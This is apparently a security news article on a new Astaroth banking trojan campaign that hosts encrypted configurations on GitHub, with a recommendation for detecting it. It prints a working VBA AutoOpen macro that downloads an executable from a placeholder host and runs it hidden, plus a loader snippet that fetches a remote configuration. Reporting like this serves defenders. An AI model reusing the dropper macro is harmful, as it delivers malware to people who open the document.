A new wave of the Astaroth banking trojan has emerged, leveraging a novel approach to distribute its malicious configuration files.
First detected in late 2025, this latest campaign employs GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints.
By hiding critical settings behind GitHub’s trusted domain, Astaroth evades conventional network-based detections and blends seamlessly with routine developer traffic.
Delivery remains consistent with previous outbreaks, relying on spear-phishing emails that contain malicious Word documents outfitted with obfuscated macros and decoy content to dupe analysts.
Early victims report receiving emails purporting to be from financial institutions or corporate partners, often citing urgent invoice discrepancies.
Opening the attached document triggers a Visual Basic for Applications (VBA) macro that downloads a lightweight .NET loader from a remote site.
Once executed, the loader reaches out to GitHub’s raw content URLs to fetch the next-stage configuration, which is then decrypted in memory before spawning multiple threads for web injection and credential harvesting.
McAfee researchers noted that by using GitHub as a distribution point, the malware bypasses static allow-lists and hides in plain sight of endpoint protection platforms, significantly extending its window of operation.
Targeted primarily at European and North American banking customers, Astaroth’s impact includes unauthorized fund transfers, credential theft across multiple online banking portals, and in certain cases ransomware deployment for lateral movement.
Advanced Configuration Management Through GitHub Infrastructure
Victims remain unaware of the infection for weeks, as the malware employs both process hollowing and parent-child process masquerading to avoid sandbox detection.
Files dropped to disk are minimal, and registry entries masquerade as legitimate Microsoft Office components, complicating forensic analysis for security teams.
.webp "Astaroth Banking Malware Leveraging GitHub to Host Malware Configurations 3")
Delving into the infection mechanism reveals a sophisticated multi-stage process designed for stealth and reliability.
Upon opening the malicious Word document, the embedded macro executes the following sequence:-
Sub AutoOpen()
Dim objHTTP As Object
Dim strURL As String
Dim strTemp As String
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
strURL = "https://example.com/loader.exe"
objHTTP.Open "GET", strURL, False
objHTTP.Send
strTemp = Environ("TEMP") & "ldr.exe"
If objHTTP.Status = 200 Then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(strTemp, True)
objFile.Write objHTTP.responseBody
objFile.Close
CreateObject("WScript.Shell").Run strTemp, 0, False
End If
End SubOnce ldr.exe executes, it invokes the following .NET routine to fetch and decrypt the GitHub-hosted configuration:
var url = "https://raw.githubusercontent.com/user/repo/main/config.dat";
using var wc = new WebClient();
byte[] data = wc.DownloadData(url);
byte[] decrypted = DecryptConfig(data, key);
var configJson = Encoding.UTF8.GetString(decrypted);This mechanism illustrates Astaroth’s reliance on legitimate infrastructure to obscure malicious intent, complicating the ability of network defenders to discriminate between benign and malicious traffic.
Continuous monitoring of unusual GitHub raw content access from non-developer endpoints is now recommended as a key detection strategy.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
